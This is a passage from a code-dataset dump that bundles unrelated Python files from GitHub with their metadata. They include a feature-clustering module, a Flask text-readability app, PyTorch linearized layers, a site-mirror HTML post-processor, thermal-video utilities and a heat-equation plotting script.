False\n\nprint(dict)\n","repo_name":"lilidemini/python_learning","sub_path":"14.4_WHILE_со_списками&словарями.py","file_name":"14.4_WHILE_со_списками&словарями.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"12505348118","text":"from setuptools import setup\n\nascii_snake = \"\"\"\\\n --..,_ _,.--.\n `'.'. .'`__ o `;__.\n '.'. .'.'` '---'` `\n '.`'--....--'`.'\n `'--....--'`\n\"\"\"\n\nsetup(\n name='pycompseries',\n version='0.1',\n packages=['pycompseries'],\n install_requires=[],\n url='',\n license='BSD',\n author='mcXrd',\n author_email='',\n description=ascii_snake,\n long_description=open('README.md').read(),\n python_requires='>=3.6',\n entry_points={\n 'console_scripts': [\n 'pycompseries = pycompseries:main',\n ],\n },\n tests_require=['pytest']\n)\n","repo_name":"mcXrd/pycompseries","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34910637845","text":"# -*- coding: utf-8 -*-\nimport os\nimport itertools\nimport logging\nimport pickle\nimport copy\nimport multiprocessing\n\nfrom hccf.utils.tools import parse_vw_line, compose_vw_line\nfrom hccf.utils.mathematics import loglikelihood\n\n\nlog = logging.getLogger(__name__)\n\n\nclass Node(object):\n \"\"\"\n Класс представляющий узел бинарного дерева иерархии.\n \"\"\"\n def __init__(self, value, left=None, right=None):\n self.value = value\n self.left = left\n self.right = right\n\n def show(self, depth=0):\n \"\"\"\n Метод возвращяющий строку для печати дерева на экране\n\n :param depth: отсуп узла при отображении в консоли\n :return: строку для печати в консоли\n \"\"\"\n ret = \"\"\n\n # Print right branch\n if self.right is not None:\n ret += self.right.show(depth + 1)\n\n # Print own value\n ret += \"\\n\" + (\" \"*depth) + str(self.value)\n\n # Print left branch\n if self.left is not None:\n ret += self.left.show(depth + 1)\n\n return ret\n\n def get_leaves_parents(self, parents=None):\n \"\"\"\n Метод возвращяющий список родителей данного узла\n\n :param parents: list родители узла предыдущего уровня\n :return: list список родителей данного узла\n \"\"\"\n result = {}\n\n if parents is None:\n parents = []\n\n parents_copy = parents[:]\n if self.left is None and self.right is None:\n result[self.value] = parents_copy\n else:\n parents_copy.append(self.value)\n if self.left is not None:\n result.update(self.left.get_leaves_parents(parents_copy))\n if self.right is not None:\n result.update(self.right.get_leaves_parents(parents_copy))\n\n return result\n\n def to_gml(self):\n \"\"\"\n Метод возвращает GML отображение графа\n \"\"\"\n nodes, edges = self._gml()\n nodes[self.value] = self.value\n\n res = \"graph\\n[\\n\"\n for node_index, node_label in enumerate(nodes.keys()):\n nodes[node_label] = node_index\n res += (' node\\n [\\n id %i\\n label \"%s\"\\n ]\\n' %\n (node_index, node_label))\n for edge in edges:\n res += (' edge\\n [\\n source %i\\n target %i\\n ]\\n' %\n (nodes[edge[\"source\"]], nodes[edge[\"target\"]]))\n res += \"]\\n\"\n return res\n\n def _gml(self):\n nodes = {}\n edges = []\n\n if self.left is not None:\n nodes[self.left.value] = self.left.value\n edges.append({\n 'source': self.value,\n 'target': self.left.value,\n })\n left_nodes, left_edges = self.left._gml()\n nodes.update(left_nodes)\n edges += left_edges\n\n if self.right is not None:\n nodes[self.right.value] = self.right.value\n edges.append({\n 'source': self.value,\n 'target': self.right.value,\n })\n right_nodes, right_edges = self.right._gml()\n nodes.update(right_nodes)\n edges += right_edges\n\n return nodes, edges\n\n\ndef calculate_pair_ll(feature_value_pair):\n \"\"\"\n Функция, вычисляющая likelihood пары значений категориального фактора\n\n :param feature_value_pair: пара значений категориального фактора\n :return: float значение likelihood\n \"\"\"\n ll_pair = 0\n tmp_feature_value_data = {}\n for feature_value_pair_index in feature_value_pair:\n for feature_values, (shows, clicks) in FeatureClustering.feature_data[feature_value_pair_index].iteritems():\n ll_pair -= loglikelihood(shows, clicks)\n\n tmp_feature_values = list(feature_values)\n tmp_feature_values[FeatureClustering.feature_index] = None\n tmp_feature_values = tuple(tmp_feature_values)\n\n if tmp_feature_values not in tmp_feature_value_data.keys():\n tmp_feature_value_data[tmp_feature_values] = (shows, clicks)\n else:\n shows_tmp, clicks_tmp = tmp_feature_value_data[tmp_feature_values]\n tmp_feature_value_data[tmp_feature_values] = (shows + shows_tmp, clicks + clicks_tmp)\n\n for feature_values, (shows, clicks) in tmp_feature_value_data.iteritems():\n ll_pair += loglikelihood(shows, clicks)\n\n return ll_pair\n\n\nclass FeatureClustering(object):\n \"\"\"\n Класс для построения иерархической кластеризации значений категориальных факторов\n \"\"\"\n feature_data = None\n feature_index = None\n\n def __init__(self, processes=1):\n \"\"\"\n :param processes: количество процессов для параллельного режима, если =1, то однопоточный режим\n \"\"\"\n if not isinstance(processes, int) or processes < 1:\n raise ValueError('‘processes’ param has to be positive integer')\n\n self.processes = processes\n\n self.features_mapping = None\n self.features = None\n\n self.data = {}\n self.shows_count = 0\n self.clicks_count = 0\n self.trees = None\n\n def _preprocess_log(self, logfile, slice_features=None, parser=None):\n \"\"\"\n Метод обрабатывающий файл и инициализующий\n - словарь self.data, ключами которого являются пары значений в событиях,\n а значением количество кликов и показов\n - словарь self.features, ключи которого порядковые индексы факторов в файле,\n а значения – возможные значения данного фактора\n\n :param logfile: string файл для обработки\n :param slice_features: названия факторов, по которым происходит сред\n :param parser: название формата для обработка файла (vw | libffm)\n :return:\n \"\"\"\n if parser is None:\n parser = parse_vw_line\n\n for line in open(logfile):\n example_params = parser(line)\n if self.features is None:\n if slice_features is not None:\n self.features = [set() for i in xrange(len(slice_features))]\n self.features_mapping = dict([(feature_name, feature_index)\n for feature_index, feature_name in\n enumerate(slice_features)])\n else:\n self.features = [set() for i in xrange(len(example_params['features']))]\n self.features_mapping = dict([(feature_name, feature_index)\n for feature_index, (feature_name, feature_value) in\n enumerate(example_params['features'])])\n\n for feature_name, feature_value in example_params['features']:\n feature_index = self.features_mapping.get(feature_name)\n if feature_index is not None:\n self.features[feature_index].add(feature_value)\n\n if slice_features is not None:\n feature_example_dict = dict(example_params['features'])\n example_values = tuple((feature_example_dict[feature_name] for feature_name in slice_features))\n else:\n example_values = tuple((feature_value for feature_name, feature_value in example_params['features']))\n\n if example_values not in self.data:\n self.data[example_values] = (0, 0)\n\n shows, clicks = self.data[example_values]\n shows += 1\n self.shows_count += 1\n if example_params['label'] > 0:\n clicks += 1\n self.clicks_count += 1\n self.data[example_values] = (shows, clicks)\n\n def gml_graph(self, feature):\n \"\"\"\n Метод возвращает отображение иерархии значений категориального фактора в GML формате\n :param feature: название фактора\n :return: string\n \"\"\"\n if feature not in self.trees.keys():\n raise ValueError('no hierarchy for feature `%s`' % feature)\n return self.trees[feature].to_gml()\n\n def convert_log(self, input_logfile, output_logfile, output_params, parser=None, composer=None):\n \"\"\"\n Метод, преобразующий исходных набов данных в набор данных с дополнительными факторами после кластеризации\n\n :param input_logfile: string входной файл\n :param output_logfile: string выходной файл\n :param output_params: dict параметры дополнительных факторов\n output_params: {\n 'mode': ,\n 'levels': 5\n }\n\n :\n * full_tree - полное дерево до корня с листьями\n * tree_without_leaves - дерево без листьев\n * part_tree\n\n :param parser: func функция-парсер исходного набора данных\n :param composer: func функция-композитор выходного набора\n \"\"\"\n if parser is None:\n parser = parse_vw_line\n\n if composer is None:\n composer = compose_vw_line\n\n output_file = open(output_logfile, 'w+')\n output_mode = output_params.get('mode', 'full_tree')\n feature_mapping = {}\n\n for feature_name, feature_tree in self.trees.iteritems():\n feature_mapping[feature_name] = feature_tree.get_leaves_parents()\n\n for line in open(input_logfile):\n example_params = parser(line)\n features = []\n for feature_name, feature_value in example_params['features']:\n if feature_name in self.trees.keys():\n feature_value_tree = feature_mapping[feature_name].get(feature_value, [])\n if output_mode == 'full_tree':\n features.append((feature_name, feature_value))\n elif output_mode == 'tree_without_leaves':\n pass\n elif output_mode == 'part_tree':\n features.append((feature_name, feature_value))\n feature_value_tree = feature_value_tree[len(feature_value_tree) - output_params['levels']: len(feature_value_tree)]\n features.append((feature_name + '_tree', feature_value_tree))\n else:\n features.append((feature_name, feature_value))\n\n output_file.write(composer(example_params['label'], features) + '\\n')\n\n def cluster(self, input_logfile, tree_features, slice_features=None, parser=None):\n \"\"\"\n Метод для построения иерархии значений категориальных факторов\n\n :param input_logfile: string входной файл\n :param tree_features: list список названий категориальных факторов для кластеризации\n :param slice_features: list список \"разрезов\" для построения иерархии\n :param parser: func функция-парсер исходного набора данных\n :return: dict деревья (иерархии кластеров) для каждого категориального фактора, переданного в tree_features\n \"\"\"\n if not os.path.isfile(input_logfile):\n raise ValueError('no input file `%s` found' % input_logfile)\n elif len(tree_features) <= 0:\n raise ValueError('`tree_features` param was not passed')\n\n features = copy.copy(tree_features)\n if slice_features is not None:\n features += slice_features\n features = list(set(features))\n self._preprocess_log(input_logfile, slice_features=features, parser=parser)\n\n feature_names = self.features_mapping.keys()\n for feature_name in tree_features:\n if feature_name not in feature_names:\n raise ValueError('feature `%s` was not found in input log' % feature_name)\n\n self.trees = {}\n for feature_name in tree_features:\n if self.processes > 1:\n self.trees[feature_name] = self._cluster_feature_parallel(feature_name)\n else:\n self.trees[feature_name] = self._cluster_feature(feature_name)\n return self.trees\n\n def _join_feature_value_pair(self, feature_index, feature_value_pair, feature_data):\n \"\"\"\n Метод для объединения значений в кластер\n\n :param feature_index: int\n :param feature_value_pair: tuple (feature_value1, feature_value2)\n :param feature_data: dict\n :return: dict\n \"\"\"\n tmp_feature_value_data = {}\n for feature_value_pair_index in feature_value_pair:\n for feature_values, (shows, clicks) in feature_data[feature_value_pair_index].iteritems():\n tmp_feature_values = list(feature_values)\n tmp_feature_values[feature_index] = None\n tmp_feature_values = tuple(tmp_feature_values)\n\n if tmp_feature_values not in tmp_feature_value_data.keys():\n tmp_feature_value_data[tmp_feature_values] = (shows, clicks)\n else:\n shows_tmp, clicks_tmp = tmp_feature_value_data[tmp_feature_values]\n tmp_feature_value_data[tmp_feature_values] = (shows + shows_tmp, clicks + clicks_tmp)\n return tmp_feature_value_data\n\n def _cluster_feature_parallel(self, feature_name):\n \"\"\"\n Метод для построения иерархии значений категориального фактора в многопоточном режиме\n Количество процессов задается в конструкторе (параметр processes)\n\n :param feature_name: string название категориального фактора\n :return: Node дерево (иерархии кластеров) для категориального фактора\n \"\"\"\n feature_index = FeatureClustering.feature_index = self.features_mapping[feature_name]\n FeatureClustering.feature_data = {}\n for feature_value, data in self.data.iteritems():\n feature_value_data = FeatureClustering.feature_data.setdefault(feature_value[feature_index], {})\n feature_value_data[feature_value] = data\n\n current_extra_node_index = 1\n extra_nodes = {}\n\n while len(FeatureClustering.feature_data.keys()) > 1:\n pool = multiprocessing.Pool(self.processes)\n min_ll_pair_delta = float(\"inf\")\n min_pair = None\n\n feature_value_pairs = list(itertools.combinations(FeatureClustering.feature_data.keys(), r=2))\n feature_value_ll = pool.map(calculate_pair_ll, feature_value_pairs)\n\n for i in xrange(len(feature_value_ll)):\n if feature_value_ll[i] <= min_ll_pair_delta:\n min_pair = feature_value_pairs[i]\n min_ll_pair_delta = feature_value_ll[i]\n\n tmp_feature_value_data = self._join_feature_value_pair(\n feature_index,\n min_pair,\n FeatureClustering.feature_data,\n )\n\n for feature_value_pair_index in min_pair:\n del FeatureClustering.feature_data[feature_value_pair_index]\n\n current_extra_node_label = str(current_extra_node_index) + '*'\n FeatureClustering.feature_data[current_extra_node_label] = tmp_feature_value_data\n\n extra_nodes[current_extra_node_label] = Node(\n current_extra_node_label,\n left=extra_nodes.get(min_pair[0], Node(min_pair[0])),\n right=extra_nodes.get(min_pair[1], Node(min_pair[1])),\n )\n current_extra_node_index += 1\n log.debug('min_pair %s, extra_node_index=%s, min_ll_pair=%s', min_pair, current_extra_node_index, min_ll_pair_delta)\n pool.close()\n pool.join()\n\n tree = extra_nodes[FeatureClustering.feature_data.keys()[0]]\n return tree\n\n def _cluster_feature(self, feature_name):\n \"\"\"\n Метод для построения иерархии значений категориального фактора в однопоточном режиме\n\n :param feature_name: string название категориального фактора\n :return: Node дерево (иерархии кластеров) для категориального фактора\n \"\"\"\n feature_index = self.features_mapping[feature_name]\n feature_data = {}\n # Для оптимизации перекладываем в словарь,\n # ключами которого являются значения кластеризуемого фактора\n for feature_value, data in self.data.iteritems():\n feature_value_data = feature_data.setdefault(feature_value[feature_index], {})\n feature_value_data[feature_value] = data\n\n current_extra_node_index = 1\n extra_nodes = {}\n\n while len(feature_data.keys()) > 1:\n # Инициализируем параметры для выбора пар�� значений для объединения\n min_ll_pair = float(\"inf\")\n min_pair = None\n min_tmp_feature_value_data = None\n\n # Строим все пары значений кластеризуемого фактора\n for feature_value_pair in itertools.combinations(feature_data.keys(), r=2):\n ll_pair = 0\n tmp_feature_value_data = {}\n for feature_value_pair_index in feature_value_pair:\n for feature_values, (shows, clicks) in feature_data[feature_value_pair_index].iteritems():\n ll_pair -= loglikelihood(shows, clicks)\n\n tmp_feature_values = list(feature_values)\n tmp_feature_values[feature_index] = None\n tmp_feature_values = tuple(tmp_feature_values)\n\n if tmp_feature_values not in tmp_feature_value_data.keys():\n tmp_feature_value_data[tmp_feature_values] = (shows, clicks)\n else:\n shows_tmp, clicks_tmp = tmp_feature_value_data[tmp_feature_values]\n tmp_feature_value_data[tmp_feature_values] = (shows + shows_tmp, clicks + clicks_tmp)\n\n for feature_values, (shows, clicks) in tmp_feature_value_data.iteritems():\n ll_pair += loglikelihood(shows, clicks)\n\n if ll_pair <= min_ll_pair:\n min_ll_pair = ll_pair\n min_pair = feature_value_pair\n min_tmp_feature_value_data = tmp_feature_value_data.copy()\n\n for feature_value_pair_index in min_pair:\n del feature_data[feature_value_pair_index]\n\n current_extra_node_label = str(current_extra_node_index) + '*'\n feature_data[current_extra_node_label] = min_tmp_feature_value_data\n\n # Добавляем новый узел девера (иерархия кластеров)\n extra_nodes[current_extra_node_label] = Node(\n current_extra_node_label,\n left=extra_nodes.get(min_pair[0], Node(min_pair[0])),\n right=extra_nodes.get(min_pair[1], Node(min_pair[1])),\n )\n current_extra_node_index += 1\n log.debug('min_pair %s, extra_node_index=%s, min_ll_pair=%s', min_pair, current_extra_node_index, min_ll_pair)\n\n tree = extra_nodes[feature_data.keys()[0]]\n return tree\n\n @staticmethod\n def load(filename):\n \"\"\"\n Метод загружает модель иерархической кластеризации из файла\n :return: FeatureClustering\n \"\"\"\n f = file(filename)\n model = pickle.loads(f.read())\n f.close()\n return model\n\n def save(self, filename):\n \"\"\"\n Метод сохраняет модель иерархической кластеризации в файл\n \"\"\"\n f = file(filename, 'w+')\n f.write(pickle.dumps(self))\n f.close()\n","repo_name":"kazarinov/hccf","sub_path":"hccf/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":21522,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27708326937","text":"from flask import Flask, jsonify, request, render_template, url_for, redirect\nfrom torch_utils import get_predictions, text_to_tensor\n\napp = Flask(__name__)\n\n@app.route(\"/\", methods = [\"POST\", \"GET\"])\ndef home():\n if request.method == 'POST':\n text1 = request.form[\"nm1\"]\n text2 = request.form[\"nm2\"]\n\n ids1, mask1 = text_to_tensor(text1)\n prediction1 = get_predictions(ids1, mask1)\n ids2, mask2 = text_to_tensor(text2)\n prediction2 = get_predictions(ids2, mask2)\n if prediction1>prediction2:\n return render_template(\"index.html\", prediction1 = \"Text A is the easiest to read !\")\n else:\n return render_template(\"index.html\", prediction1 = \"Text B is the easiest to read !\")\n\n else:\n return render_template(\"index.html\") \n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"gaetanlop/Commonlit-Readability-Competition","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"33833752869","text":"import torch\nimport torch.nn.functional as F\nimport torch.nn as nn\nfrom torch.nn import Parameter\nimport numpy as np\nfrom torch import Tensor\n\nNOISE_SCALE = 1e-12\n\nclass LinearConv2D(nn.Conv2d):\n def __init__(\n self,\n in_channels: int,\n out_channels: int,\n kernel_size,\n stride=1,\n padding=0,\n dilation=1,\n groups: int = 1,\n bias: bool = True,\n padding_mode: str = 'zeros' # TODO: refine this type\n ):\n super().__init__(in_channels, out_channels, kernel_size, stride, padding, dilation\n ,groups, bias, padding_mode)\n\n self.linear_weight = Parameter(torch.zeros_like(self.weight, requires_grad=True) + NOISE_SCALE)\n if bias:\n self.linear_bias = Parameter(torch.zeros_like(self.bias, requires_grad=True) + NOISE_SCALE)\n else:\n self.linear_bias = None\n\n def _linear_forward(self, input: Tensor) -> Tensor:\n if self.padding_mode != 'zeros':\n return F.conv2d(F.pad(input, self._reversed_padding_repeated_twice, mode=self.padding_mode),\n self.linear_weight, self.linear_bias, self.stride,\n _pair(0), self.dilation, self.groups)\n return F.conv2d(input, self.linear_weight, self.linear_bias, self.stride,\n self.padding, self.dilation, self.groups)\n\n def _conv_forward(self, input: Tensor, add_bias: bool = True) -> Tensor:\n bias = self.bias if add_bias else None\n if self.padding_mode != 'zeros':\n return F.conv2d(F.pad(input, self._reversed_padding_repeated_twice, mode=self.padding_mode),\n self.weight, bias, self.stride,\n _pair(0), self.dilation, self.groups)\n return F.conv2d(input, self.weight, bias, self.stride,\n self.padding, self.dilation, self.groups)\n\n def forward(self, input: Tensor, input_jvp: Tensor) -> Tensor:\n output = self._conv_forward(input)\n output_jvp = self._linear_forward(input) + self._conv_forward(input_jvp, add_bias=False)\n return output, output_jvp\n\nclass LinearLinear(nn.Linear):\n\n def __init__(self, in_features: int, out_features: int, bias: bool = True) -> None:\n super().__init__(in_features, out_features, bias)\n self.linear_weight = Parameter(torch.zeros_like(self.weight, requires_grad=True) + NOISE_SCALE)\n if bias:\n self.linear_bias = Parameter(torch.zeros_like(self.bias, requires_grad=True) + NOISE_SCALE)\n else:\n self.linear_bias = None\n\n def forward(self, input: Tensor, input_jvp: Tensor) -> Tensor:\n output = super().forward(input)\n output_jvp = F.linear(input, self.linear_weight, self.linear_bias) + F.linear(input_jvp, self.weight, None)\n return output, output_jvp\n\nclass LinearReLU(nn.ReLU):\n\n def forward(self, input: Tensor, input_jvp: Tensor) -> Tensor:\n output = super().forward(input)\n output_jvp = input_jvp * (output > 0).float()\n return output, output_jvp\n\nclass LinearSequential(nn.Sequential):\n\n def forward(self, *input):\n for module in self:\n input = module(*input)\n return input\n\nclass LinearBatchNorm2d(nn.BatchNorm2d):\n def __init__(self, num_features: int, eps: float = 1e-5, momentum: float = 0.1, affine=True,\n track_running_stats=True) -> None:\n super().__init__(num_features, eps, momentum, affine, track_running_stats)\n if affine:\n self.linear_weight = Parameter(torch.zeros_like(self.weight, requires_grad=True) + NOISE_SCALE)\n self.linear_bias = Parameter(torch.zeros_like(self.bias, requires_grad=True) + NOISE_SCALE)\n\n def _linear_forward(self, input: Tensor) -> Tensor:\n return F.batch_norm(input, self.running_mean, self.running_var,\n self.linear_weight, self.linear_bias, training=False, momentum=self.momentum, eps=self.eps)\n\n def _jvp_forward(self, input: Tensor) -> Tensor:\n return F.batch_norm(input,\n torch.zeros_like(self.running_mean), self.running_var, self.weight, None, training=False,\n momentum=self.momentum, eps=self.eps)\n\n def forward(self, input: Tensor, input_jvp:Tensor) -> Tensor:\n output = super().forward(input)\n output_jvp = self._linear_forward(input) + self._jvp_forward(input_jvp)\n return output, output_jvp\n\nclass LinearAdaptiveAvgPool2d(nn.AdaptiveAvgPool2d):\n\n def __init__(self, output_size) -> None:\n super().__init__(output_size)\n\n def forward(self, input, input_jvp):\n return super().forward(input), super().forward(input_jvp)\n\n","repo_name":"tianyu139/tangent-model-composition","sub_path":"models/linear_layers.py","file_name":"linear_layers.py","file_ext":"py","file_size_in_byte":4738,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"71424570340","text":"import glob\nfrom bs4 import BeautifulSoup, Tag, Comment\nimport re\nimport logging\nimport os\nimport gc\nfrom datetime import datetime\n\nBUILD_TIME = datetime.now().strftime(\"%d %B %Y, %H:%M:%S\")\nlogger = logging.getLogger()\nlogger.setLevel(os.environ.get(\"LOG_LEVEL\", \"CRITICAL\"))\n\n\n# change index\nfor html_file_path in glob.glob(\"**/index.html\", recursive=True):\n with open(html_file_path, \"rb+\") as file:\n soup = BeautifulSoup(file.read(), \"lxml\")\n soup.title.string = \"SUTD Capstone\"\n file.seek(0)\n file.write(bytes(str(soup), \"utf-8\"))\n file.truncate()\n soup.decompose()\n gc.collect()\n\nfor html_file_path in glob.glob(\"**/*.html\", recursive=True):\n if \"apos-minified\" in html_file_path:\n continue\n try:\n with open(html_file_path, \"rb+\") as file:\n soup = BeautifulSoup(file.read(), \"lxml\")\n # is this even valid html\n if soup.head is None:\n continue\n\n try:\n # try to derive the page url\n ORIGINAL_URL = \"https://capstone.sutd.edu.sg\"\n for comments in soup.findAll(\n text=lambda text: isinstance(text, Comment)\n ):\n try:\n comment = comments.extract().strip()\n if comment.index(\"Mirrored from\") == 0:\n m = re.search(r\"Mirrored from (.*) by HTTrack\", comment)\n ORIGINAL_URL = f\"https://{m.group(1)}\"\n break\n except:\n break\n except Exception as ex:\n logger.error(f\"Unable to derive page url for {html_file_path}\")\n # add meta tags\n # is it project?\n try:\n if len(soup.select(\"div.project-detail_detail\")) != 0:\n # is project\n project_name = soup.select(\n \"div.project-detail_detail .detail-title h2\"\n )[0].string\n og_preview_name = project_name\n og_preview_description = (\n \"[MIRROR] SUTD Capstone Project Virtual Showcase\"\n )\n else:\n og_preview_name = \"[MIRROR] SUTD Virtual Capstone Showcase 2020\"\n og_preview_description = (\n \"Find out more about SUTD's Capstone projects\"\n )\n meta_tag_attrs = [\n {\"property\": \"og:title\", \"content\": og_preview_name},\n {\"property\": \"og:description\", \"content\": og_preview_description},\n {\"name\": \"twitter:title\", \"content\": og_preview_name},\n {\"name\": \"twitter:description\", \"content\": og_preview_description},\n ]\n meta_tags = [soup.new_tag(\"meta\", attrs=a) for a in meta_tag_attrs]\n for meta_tag in meta_tags:\n soup.head.append(meta_tag)\n except Exception as ex:\n logger.error(f\"Unable to add meta tags on file {html_file_path}\")\n # add mirror build notice\n try:\n soup.select_one(\".navbar-default\").append(\n BeautifulSoup(\n f\"\"\"\n
    You're viewing a mirror built at {BUILD_TIME}.\n Click here to go to the original version.\n More Info\n
    \"\"\",\n \"html.parser\",\n )\n )\n except Exception as ex:\n logger.error(f\"Unable to add mirror notice on file {html_file_path}\")\n # attempt to restore data tags\n # try:\n # remote_response = requests.get(ORIGINAL_URL, verify=False, stream=True)\n # remote_response.raw.decode_content = True\n # # tree = lxml.html.parse(remote_response.raw)\n # remote_soup = BeautifulSoup(remote_response.raw, \"lxml\")\n # tags_with_data = soup.find_all(\n # re.compile(\".*\"), attrs={\"data-apos-widget-id\": re.compile(\".*\")}\n # )\n # for tag in tags_with_data:\n # this_widget_id = tag[\"data-apos-widget-id\"]\n # matching_tag = remote_soup.find(\n # re.compile(\".*\"),\n # attrs={\"data-apos-widget-id\": tag[\"data-apos-widget-id\"]},\n # )\n # if matching_tag is None:\n # continue\n # tag[\"data\"] = matching_tag[\"data\"]\n # except Exception as ex:\n # logger.error(f\"Unable to restore data stag for file {html_file_path}\")\n # fix youtube video links\n try:\n to_replace = [\n i\n for i in soup.select(\"img.apos-video-thumbnail\")\n if \"i.ytimg.com/vi/\" in i[\"src\"]\n ]\n video_id_matcher = re.compile(r\"i\\.ytimg\\.com/vi/(\\w+)/\")\n for img in to_replace:\n video_id = video_id_matcher.search(img[\"src\"]).group(1)\n iframe: Tag = soup.new_tag(\"iframe\")\n iframe[\"src\"] = f\"https://www.youtube.com/embed/{video_id}\"\n iframe[\"frameborder\"] = \"0\"\n iframe[\"style\"] = \"height: calc(100vw / 16 * 9)\"\n iframe[\n \"allow\"\n ] = \"accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture\"\n iframe[\"allowfullscreen\"] = \"\"\n img.replace_with(iframe)\n except Exception as ex:\n logger.error(\n f\"Unable to convert youtube video thumbnail for {html_file_path}\"\n )\n # save the file\n file.seek(0)\n file.write(bytes(str(soup), \"utf-8\"))\n file.truncate()\n soup.decompose()\n gc.collect()\n except:\n logger.error(f\"Error ocurred for file {html_file_path}\")\n pass\n","repo_name":"OpenSUTD/capstone_2020_mirror","sub_path":"playbooks/post_process/python_scripts/files/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":6283,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"74489563939","text":"import cv2\r\nimport datetime\r\nimport numpy as np\r\nimport os\r\nimport time\r\n\r\n# Thermal filenames format\r\nDATE_FORMAT = \"%Y-%m-%d_%H:%M:%S\"\r\n\r\ndef get_local_time_from_utc(time_str, date_format=\"%Y-%m-%d_%H:%M:%S\"):\r\n \"\"\" Parse the time string and get local time \"\"\"\r\n # Convert to UTC-7\r\n t = datetime.datetime.strptime(time_str, date_format) - datetime.timedelta(hours=7)\r\n return t\r\n\r\ndef thermal_file_within_date(thermal_filename, date):\r\n \"\"\"\r\n Check that the thermal file is within the given date\r\n thermal_filename: Ex. 2017-10-12_21:35:34.000000.mov\r\n date: Ex. 17-10-13\r\n \"\"\"\r\n # Get time of the thermal video\r\n time_str = thermal_filename.split('.')[0]\r\n t = get_local_time_from_utc(time_str)\r\n # Get start and end time of the day\r\n year, month, day = [int(x) for x in date.split('-')]\r\n year += 2000\r\n start = datetime.datetime(year=year, month=month, day=day)\r\n try:\r\n end = datetime.datetime(year=year, month=month, day=day+1)\r\n except:\r\n # (day+1) is out of range for month\r\n end = datetime.datetime(year=year, month=month+1, day=1)\r\n return t > start and t < end\r\n\r\ndef get_time_from_frame(end_time_in_seconds, video_length, frame_number, num_frames):\r\n \"\"\"\r\n Linearly calculate the time. frame_number can be a numpy array.\r\n \"\"\"\r\n # Time difference between frame and start of video\r\n delta = video_length / (num_frames - 1) * frame_number\r\n return end_time_in_seconds - video_length + delta\r\n\r\ndef calc_thermal_time(thermal_end_time, video_data, frame_number):\r\n \"\"\" Calculate time of a frame from thermal video. \"\"\"\r\n num_frames = video_data[\"num_frames\"]\r\n video_length = video_data[\"video_length\"]\r\n # Get end time\r\n end_time = get_local_time_from_utc(thermal_end_time)\r\n end_time_in_seconds = time.mktime(end_time.timetuple())\r\n t_in_seconds = get_time_from_frame(end_time_in_seconds, video_length, frame_number, num_frames)\r\n return t_in_seconds\r\n\r\ndef read_thermal_file(file_path, upside_down=False):\r\n \"\"\"\r\n Read a thermal video file, e.g. 2017-10-11_18:56:18.000000_1.mov.\r\n \"\"\"\r\n cap = cv2.VideoCapture(file_path)\r\n if not cap.isOpened():\r\n raise ValueError(\"OpenCV cannot open {}.\\nTry using /usr/bin/python3.\".format(file_path))\r\n\r\n frames = []\r\n while True:\r\n ret, frame = cap.read()\r\n if not ret:\r\n break\r\n if upside_down:\r\n frame = np.rot90(frame, k=2)\r\n # 3 channels, each channel is one frame.\r\n frames.append(frame[:,:,0])\r\n frames = np.array(frames)\r\n cap.release()\r\n return frames\r\n\r\ndef scale_thermal_frame(frame):\r\n \"\"\" Frame values are (temperature * 2) \"\"\"\r\n frame = (frame / 2).clip(10, 40) - 10\r\n frame = (frame / 30 * 255).astype(np.uint8)\r\n return frame\r\n\r\ndef write_thermal_frames(file_path, output_dir, scale_frame=False, upside_down=True):\r\n frames = read_thermal_file(file_path, upside_down)\r\n num_frames, height, width = frames.shape\r\n for i in range(num_frames):\r\n filename = \"t-{:06d}.png\".format(i)\r\n output_file = os.path.join(output_dir, filename)\r\n frame = frames[i]\r\n if scale_frame:\r\n frame = scale_thermal_frame(frames[i])\r\n cv2.imwrite(output_file, frame)\r\n\r\ndef read_thermal_timestamps(timestamps_file):\r\n \"\"\"\r\n Each line is in this format: 2017-10-20T05:45:05.458018Z\r\n Return timestamps in seconds.\r\n \"\"\"\r\n timestamps = []\r\n with open(timestamps_file, 'r') as f:\r\n for line in f:\r\n time_str, suffix = line.strip().split('.')\r\n date_format = \"%Y-%m-%dT%H:%M:%S\"\r\n t = get_local_time_from_utc(time_str, date_format)\r\n t_in_seconds = time.mktime(t.timetuple())\r\n ms = int(suffix[:3]) / 1000.0\r\n t_in_seconds += ms\r\n timestamps.append(t_in_seconds)\r\n return timestamps\r\n\r\n","repo_name":"ClaraBing/MED277ICU","sub_path":"data_annotate_NIPS18/utils/thermal_utils.py","file_name":"thermal_utils.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"20713530701","text":"import numpy as np\nimport math\nimport os\nfrom pathlib import Path\n\nfrom approximator.examples.heat.heat import approximation\nfrom approximator.utils.visualization import plot_approximation_residuals, plot_approximation, \\\n plot_approximation_deviation\n\ndir_path = Path(os.path.dirname(os.path.realpath(__file__)))\nfig_dir_path = dir_path.joinpath(\"figs\")\nfig_dir_path.mkdir(parents=False, exist_ok=True)\n# run_path = Path(f\"heat-3/1\")\nrun_path = Path(f\"2021-03-15 10:58:29.442608\")\n\napproximation.load(dir_path.joinpath(run_path).joinpath(\"net.pt\"))\n\nplot_approximation(\n approximation,\n xlabel=\"$t$\", ylabel=\"$z$\",\n title=\"Approximated solution of the heat equation\",\n dir_path=fig_dir_path,\n show=False\n)\n\nplot_approximation_residuals(\n approximation,\n xlabel=\"$t$\", ylabel=\"$z$\",\n title=\"Residuals\",\n dir_path=fig_dir_path,\n show=False\n)\n\n\ndef analytically(t, z):\n return math.exp(-math.pi ** 2 * t / 4) * math.cos(math.pi * z / 